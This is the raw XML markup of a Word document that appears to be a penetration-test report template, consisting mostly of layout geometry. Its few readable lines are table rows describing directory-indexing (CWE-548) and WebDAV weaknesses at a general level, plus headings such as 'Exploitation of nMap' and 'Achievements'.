          <w:p w14:paraId="30B4677C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218" w:lineRule="auto"/>
              <w:ind w:right="661"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Directory Indexing Vulnerability CWE-548</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBD8E8"/>
          </w:tcPr>
          <w:p w14:paraId="13F2C38F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218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Attacker can view and download content of a directory located on a vulnerable device</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="634511AD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Sensitive and conﬁdential data exposure. System security breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377979" w14:paraId="60F26F59" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1193"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5768789C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218" w:lineRule="auto"/>
              <w:ind w:right="2352"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>WebDAV Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBD8E8"/>
          </w:tcPr>
          <w:p w14:paraId="5DE7D236" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218" w:lineRule="auto"/>
              <w:ind w:right="654"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Exploit WebDAV on a server or using Shell access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21783DC8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="30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WebDAV conﬁgurations are lacking</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CE6E52B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="8" w:line="218" w:lineRule="auto"/>
              <w:ind w:right="186"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>- this allows hackers to remotely edit website’s content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FA6832C" w14:textId="2BB519AF" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"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39B4F8C4" wp14:editId="42CF7480">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>85725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="120" name="Lin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11341E" id="Line 110" o:spid="_x0000_s1026" style="position:absolute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6.75pt" to="698.4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" strokecolor="#a8b6bf">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="420300A8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="7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083D066D" w14:textId="6C9E8B73" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:spacing w:before="23"/>
        <w:ind w:left="457" w:right="264"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz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03200" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6EB85649" wp14:editId="1694FC44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119" name="Lin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5A0DF5" id="Line 109" o:spid="_x0000_s1026" style="position:absolute;z-index:-1571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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>nMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="282C2B76" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418C199F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BFB4BD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7385978A" w14:textId="6191D71E" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:ind w:left="1105" w:right="9684" w:firstLine="578"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto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76192" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30D31B9E" wp14:editId="7F7C6093">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>269240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-456565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8741410" cy="4206240"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="11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41410" cy="4206240"/>
                          <a:chOff x="424" y="-719"/>
                          <a:chExt cx="13766" cy="6624"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="114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432" y="5880"/>
                            <a:ext cx="13536" cy="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107"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="765" y="-562"/>
                            <a:ext cx="8565" cy="6459"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4971 765"/>
                              <a:gd name="T1" fmla="*/ T0 w 8565"/>
                              <a:gd name="T2" fmla="+- 0 139 -562"/>
                              <a:gd name="T3" fmla="*/ 139 h 6459"/>
                              <a:gd name="T4" fmla="+- 0 4955 765"/>
                              <a:gd name="T5" fmla="*/ T4 w 8565"/>
                              <a:gd name="T6" fmla="+- 0 -11 -562"/>
                              <a:gd name="T7" fmla="*/ -11 h 6459"/>
                              <a:gd name="T8" fmla="+- 0 4908 765"/>
                              <a:gd name="T9" fmla="*/ T8 w 8565"/>
                              <a:gd name="T10" fmla="+- 0 -150 -562"/>
                              <a:gd name="T11" fmla="*/ -150 h 6459"/>
                              <a:gd name="T12" fmla="+- 0 4836 765"/>
                              <a:gd name="T13" fmla="*/ T12 w 8565"/>
                              <a:gd name="T14" fmla="+- 0 -275 -562"/>
                              <a:gd name="T15" fmla="*/ -275 h 6459"/>
                              <a:gd name="T16" fmla="+- 0 4740 765"/>
                              <a:gd name="T17" fmla="*/ T16 w 8565"/>
                              <a:gd name="T18" fmla="+- 0 -381 -562"/>
                              <a:gd name="T19" fmla="*/ -381 h 6459"/>
                              <a:gd name="T20" fmla="+- 0 4624 765"/>
                              <a:gd name="T21" fmla="*/ T20 w 8565"/>
                              <a:gd name="T22" fmla="+- 0 -466 -562"/>
                              <a:gd name="T23" fmla="*/ -466 h 6459"/>
                              <a:gd name="T24" fmla="+- 0 4491 765"/>
                              <a:gd name="T25" fmla="*/ T24 w 8565"/>
                              <a:gd name="T26" fmla="+- 0 -526 -562"/>
                              <a:gd name="T27" fmla="*/ -526 h 6459"/>
                              <a:gd name="T28" fmla="+- 0 4346 765"/>
                              <a:gd name="T29" fmla="*/ T28 w 8565"/>
                              <a:gd name="T30" fmla="+- 0 -558 -562"/>
                              <a:gd name="T31" fmla="*/ -558 h 6459"/>
                              <a:gd name="T32" fmla="+- 0 765 765"/>
                              <a:gd name="T33" fmla="*/ T32 w 8565"/>
                              <a:gd name="T34" fmla="+- 0 -562 -562"/>
                              <a:gd name="T35" fmla="*/ -562 h 6459"/>
                              <a:gd name="T36" fmla="+- 0 769 765"/>
                              <a:gd name="T37" fmla="*/ T36 w 8565"/>
                              <a:gd name="T38" fmla="+- 0 5272 -562"/>
                              <a:gd name="T39" fmla="*/ 5272 h 6459"/>
                              <a:gd name="T40" fmla="+- 0 801 765"/>
                              <a:gd name="T41" fmla="*/ T40 w 8565"/>
                              <a:gd name="T42" fmla="+- 0 5417 -562"/>
                              <a:gd name="T43" fmla="*/ 5417 h 6459"/>
                              <a:gd name="T44" fmla="+- 0 861 765"/>
                              <a:gd name="T45" fmla="*/ T44 w 8565"/>
                              <a:gd name="T46" fmla="+- 0 5549 -562"/>
                              <a:gd name="T47" fmla="*/ 5549 h 6459"/>
                              <a:gd name="T48" fmla="+- 0 946 765"/>
                              <a:gd name="T49" fmla="*/ T48 w 8565"/>
                              <a:gd name="T50" fmla="+- 0 5665 -562"/>
                              <a:gd name="T51" fmla="*/ 5665 h 6459"/>
                              <a:gd name="T52" fmla="+- 0 1052 765"/>
                              <a:gd name="T53" fmla="*/ T52 w 8565"/>
                              <a:gd name="T54" fmla="+- 0 5761 -562"/>
                              <a:gd name="T55" fmla="*/ 5761 h 6459"/>
                              <a:gd name="T56" fmla="+- 0 1177 765"/>
                              <a:gd name="T57" fmla="*/ T56 w 8565"/>
                              <a:gd name="T58" fmla="+- 0 5834 -562"/>
                              <a:gd name="T59" fmla="*/ 5834 h 6459"/>
                              <a:gd name="T60" fmla="+- 0 1316 765"/>
                              <a:gd name="T61" fmla="*/ T60 w 8565"/>
                              <a:gd name="T62" fmla="+- 0 5880 -562"/>
                              <a:gd name="T63" fmla="*/ 5880 h 6459"/>
                              <a:gd name="T64" fmla="+- 0 1466 765"/>
                              <a:gd name="T65" fmla="*/ T64 w 8565"/>
                              <a:gd name="T66" fmla="+- 0 5897 -562"/>
                              <a:gd name="T67" fmla="*/ 5897 h 6459"/>
                              <a:gd name="T68" fmla="+- 0 9330 765"/>
                              <a:gd name="T69" fmla="*/ T68 w 8565"/>
                              <a:gd name="T70" fmla="+- 0 5453 -562"/>
                              <a:gd name="T71" fmla="*/ 5453 h 6459"/>
                              <a:gd name="T72" fmla="+- 0 9326 765"/>
                              <a:gd name="T73" fmla="*/ T72 w 8565"/>
                              <a:gd name="T74" fmla="+- 0 1049 -562"/>
                              <a:gd name="T75" fmla="*/ 1049 h 6459"/>
                              <a:gd name="T76" fmla="+- 0 9293 765"/>
                              <a:gd name="T77" fmla="*/ T76 w 8565"/>
                              <a:gd name="T78" fmla="+- 0 908 -562"/>
                              <a:gd name="T79" fmla="*/ 908 h 6459"/>
                              <a:gd name="T80" fmla="+- 0 9231 765"/>
                              <a:gd name="T81" fmla="*/ T80 w 8565"/>
                              <a:gd name="T82" fmla="+- 0 781 -562"/>
                              <a:gd name="T83" fmla="*/ 781 h 6459"/>
                              <a:gd name="T84" fmla="+- 0 9143 765"/>
                              <a:gd name="T85" fmla="*/ T84 w 8565"/>
                              <a:gd name="T86" fmla="+- 0 672 -562"/>
                              <a:gd name="T87" fmla="*/ 672 h 6459"/>
                              <a:gd name="T88" fmla="+- 0 9034 765"/>
                              <a:gd name="T89" fmla="*/ T88 w 8565"/>
                              <a:gd name="T90" fmla="+- 0 585 -562"/>
                              <a:gd name="T91" fmla="*/ 585 h 6459"/>
                              <a:gd name="T92" fmla="+- 0 8908 765"/>
                              <a:gd name="T93" fmla="*/ T92 w 8565"/>
                              <a:gd name="T94" fmla="+- 0 523 -562"/>
                              <a:gd name="T95" fmla="*/ 523 h 6459"/>
                              <a:gd name="T96" fmla="+- 0 8767 765"/>
                              <a:gd name="T97" fmla="*/ T96 w 8565"/>
                              <a:gd name="T98" fmla="+- 0 490 -562"/>
                              <a:gd name="T99" fmla="*/ 490 h 6459"/>
                              <a:gd name="T100" fmla="+- 0 5506 765"/>
                              <a:gd name="T101" fmla="*/ T100 w 8565"/>
                              <a:gd name="T102" fmla="+- 0 485 -562"/>
                              <a:gd name="T103" fmla="*/ 485 h 6459"/>
                              <a:gd name="T104" fmla="+- 0 5510 765"/>
                              <a:gd name="T105" fmla="*/ T104 w 8565"/>
                              <a:gd name="T106" fmla="+- 0 4890 -562"/>
                              <a:gd name="T107" fmla="*/ 4890 h 6459"/>
                              <a:gd name="T108" fmla="+- 0 5543 765"/>
                              <a:gd name="T109" fmla="*/ T108 w 8565"/>
                              <a:gd name="T110" fmla="+- 0 5030 -562"/>
                              <a:gd name="T111" fmla="*/ 5030 h 6459"/>
                              <a:gd name="T112" fmla="+- 0 5605 765"/>
                              <a:gd name="T113" fmla="*/ T112 w 8565"/>
                              <a:gd name="T114" fmla="+- 0 5157 -562"/>
                              <a:gd name="T115" fmla="*/ 5157 h 6459"/>
                              <a:gd name="T116" fmla="+- 0 5692 765"/>
                              <a:gd name="T117" fmla="*/ T116 w 8565"/>
                              <a:gd name="T118" fmla="+- 0 5266 -562"/>
                              <a:gd name="T119" fmla="*/ 5266 h 6459"/>
                              <a:gd name="T120" fmla="+- 0 5801 765"/>
                              <a:gd name="T121" fmla="*/ T120 w 8565"/>
                              <a:gd name="T122" fmla="+- 0 5353 -562"/>
                              <a:gd name="T123" fmla="*/ 5353 h 6459"/>
                              <a:gd name="T124" fmla="+- 0 5928 765"/>
                              <a:gd name="T125" fmla="*/ T124 w 8565"/>
                              <a:gd name="T126" fmla="+- 0 5416 -562"/>
                              <a:gd name="T127" fmla="*/ 5416 h 6459"/>
                              <a:gd name="T128" fmla="+- 0 6069 765"/>
                              <a:gd name="T129" fmla="*/ T128 w 8565"/>
                              <a:gd name="T130" fmla="+- 0 5448 -562"/>
                              <a:gd name="T131" fmla="*/ 5448 h 6459"/>
                              <a:gd name="T132" fmla="+- 0 9330 765"/>
                              <a:gd name="T133" fmla="*/ T132 w 8565"/>
                              <a:gd name="T134" fmla="+- 0 5453 -562"/>
                              <a:gd name="T135" fmla="*/ 5453 h 64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8565" h="6459">
                                <a:moveTo>
                                  <a:pt x="4206" y="6459"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4206" y="701"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4202" y="625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4190" y="551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4170" y="480"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4143" y="412"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4110" y="347"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4071" y="287"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4025" y="231"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3975" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3919" y="135"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3859" y="96"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3794" y="62"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3726" y="36"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3655" y="16"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3581" y="4"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3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58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4" y="5834"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="5908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="36" y="5979"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63" y="6047"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="96" y="6111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="135" y="6172"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="6227"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="231" y="6278"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="287" y="6323"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="347" y="6363"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="412" y="6396"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="480" y="6423"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551" y="6442"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="625" y="6454"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="701" y="6459"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4206" y="6459"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="8565" y="6015"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="8565" y="1685"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8561" y="1611"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8548" y="1539"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8528" y="1470"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8500" y="1405"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8466" y="1343"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8425" y="1286"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8378" y="1234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8326" y="1187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8269" y="1147"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8208" y="1112"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8143" y="1085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8074" y="1064"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8002" y="1052"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7928" y="1047"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4741" y="1047"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4741" y="5377"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4745" y="5452"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4757" y="5523"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4778" y="5592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4805" y="5658"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4840" y="5719"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4881" y="5776"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4927" y="5828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4979" y="5875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5036" y="5915"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5098" y="5950"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5163" y="5978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5232" y="5998"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5304" y="6010"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5378" y="6015"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8565" y="6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5125" y="-720"/>
                            <a:ext cx="9065" cy="6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CBD00" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:b/>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="04AB6C11" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:b/>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="3F5D6B18" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:b/>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="7DE243EB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:spacing w:before="4"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:b/>
                                  <w:sz w:val="27"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="6C548428" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="1"/>
                                <w:ind w:left="665"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto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Roboto"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Achievements</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="015EE10E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="38" w:line="276" w:lineRule="auto"/>
                                <w:ind w:left="665" w:right="496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What did the exploit achieve? For example: Did it grant you a user shell, root access, etc.?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Freeform 105"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="10080" y="486"/>
                            <a:ext cx="3825" cy="5122"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 13905 10081"/>
                              <a:gd name="T1" fmla="*/ T0 w 3825"/>
                              <a:gd name="T2" fmla="+- 0 5608 487"/>
                              <a:gd name="T3" fmla="*/ 5608 h 5122"/>
                              <a:gd name="T4" fmla="+- 0 10718 10081"/>
                              <a:gd name="T5" fmla="*/ T4 w 3825"/>
                              <a:gd name="T6" fmla="+- 0 5608 487"/>
                              <a:gd name="T7" fmla="*/ 5608 h 5122"/>
                              <a:gd name="T8" fmla="+- 0 10644 10081"/>
                              <a:gd name="T9" fmla="*/ T8 w 3825"/>
                              <a:gd name="T10" fmla="+- 0 5604 487"/>
                              <a:gd name="T11" fmla="*/ 5604 h 5122"/>
                              <a:gd name="T12" fmla="+- 0 10572 10081"/>
                              <a:gd name="T13" fmla="*/ T12 w 3825"/>
                              <a:gd name="T14" fmla="+- 0 5591 487"/>
                              <a:gd name="T15" fmla="*/ 5591 h 5122"/>
                              <a:gd name="T16" fmla="+- 0 10503 10081"/>
                              <a:gd name="T17" fmla="*/ T16 w 3825"/>
                              <a:gd name="T18" fmla="+- 0 5571 487"/>
                              <a:gd name="T19" fmla="*/ 5571 h 5122"/>
                              <a:gd name="T20" fmla="+- 0 10438 10081"/>
                              <a:gd name="T21" fmla="*/ T20 w 3825"/>
                              <a:gd name="T22" fmla="+- 0 5544 487"/>
                              <a:gd name="T23" fmla="*/ 5544 h 5122"/>
                              <a:gd name="T24" fmla="+- 0 10376 10081"/>
                              <a:gd name="T25" fmla="*/ T24 w 3825"/>
                              <a:gd name="T26" fmla="+- 0 5509 487"/>
                              <a:gd name="T27" fmla="*/ 5509 h 5122"/>
                              <a:gd name="T28" fmla="+- 0 10319 10081"/>
                              <a:gd name="T29" fmla="*/ T28 w 3825"/>
                              <a:gd name="T30" fmla="+- 0 5468 487"/>
                              <a:gd name="T31" fmla="*/ 5468 h 5122"/>
                              <a:gd name="T32" fmla="+- 0 10267 10081"/>
                              <a:gd name="T33" fmla="*/ T32 w 3825"/>
                              <a:gd name="T34" fmla="+- 0 5422 487"/>
                              <a:gd name="T35" fmla="*/ 5422 h 5122"/>
                              <a:gd name="T36" fmla="+- 0 10221 10081"/>
                              <a:gd name="T37" fmla="*/ T36 w 3825"/>
                              <a:gd name="T38" fmla="+- 0 5370 487"/>
                              <a:gd name="T39" fmla="*/ 5370 h 5122"/>
                              <a:gd name="T40" fmla="+- 0 10180 10081"/>
                              <a:gd name="T41" fmla="*/ T40 w 3825"/>
                              <a:gd name="T42" fmla="+- 0 5313 487"/>
                              <a:gd name="T43" fmla="*/ 5313 h 5122"/>
                              <a:gd name="T44" fmla="+- 0 10145 10081"/>
                              <a:gd name="T45" fmla="*/ T44 w 3825"/>
                              <a:gd name="T46" fmla="+- 0 5251 487"/>
                              <a:gd name="T47" fmla="*/ 5251 h 5122"/>
                              <a:gd name="T48" fmla="+- 0 10118 10081"/>
                              <a:gd name="T49" fmla="*/ T48 w 3825"/>
                              <a:gd name="T50" fmla="+- 0 5186 487"/>
                              <a:gd name="T51" fmla="*/ 5186 h 5122"/>
                              <a:gd name="T52" fmla="+- 0 10097 10081"/>
                              <a:gd name="T53" fmla="*/ T52 w 3825"/>
                              <a:gd name="T54" fmla="+- 0 5117 487"/>
                              <a:gd name="T55" fmla="*/ 5117 h 5122"/>
                              <a:gd name="T56" fmla="+- 0 10085 10081"/>
                              <a:gd name="T57" fmla="*/ T56 w 3825"/>
                              <a:gd name="T58" fmla="+- 0 5045 487"/>
                              <a:gd name="T59" fmla="*/ 5045 h 5122"/>
                              <a:gd name="T60" fmla="+- 0 10081 10081"/>
                              <a:gd name="T61" fmla="*/ T60 w 3825"/>
                              <a:gd name="T62" fmla="+- 0 4971 487"/>
                              <a:gd name="T63" fmla="*/ 4971 h 5122"/>
                              <a:gd name="T64" fmla="+- 0 10081 10081"/>
                              <a:gd name="T65" fmla="*/ T64 w 3825"/>
                              <a:gd name="T66" fmla="+- 0 487 487"/>
                              <a:gd name="T67" fmla="*/ 487 h 5122"/>
                              <a:gd name="T68" fmla="+- 0 13268 10081"/>
                              <a:gd name="T69" fmla="*/ T68 w 3825"/>
                              <a:gd name="T70" fmla="+- 0 487 487"/>
                              <a:gd name="T71" fmla="*/ 487 h 5122"/>
                              <a:gd name="T72" fmla="+- 0 13342 10081"/>
                              <a:gd name="T73" fmla="*/ T72 w 3825"/>
                              <a:gd name="T74" fmla="+- 0 491 487"/>
                              <a:gd name="T75" fmla="*/ 491 h 5122"/>
                              <a:gd name="T76" fmla="+- 0 13414 10081"/>
                              <a:gd name="T77" fmla="*/ T76 w 3825"/>
                              <a:gd name="T78" fmla="+- 0 503 487"/>
                              <a:gd name="T79" fmla="*/ 503 h 5122"/>
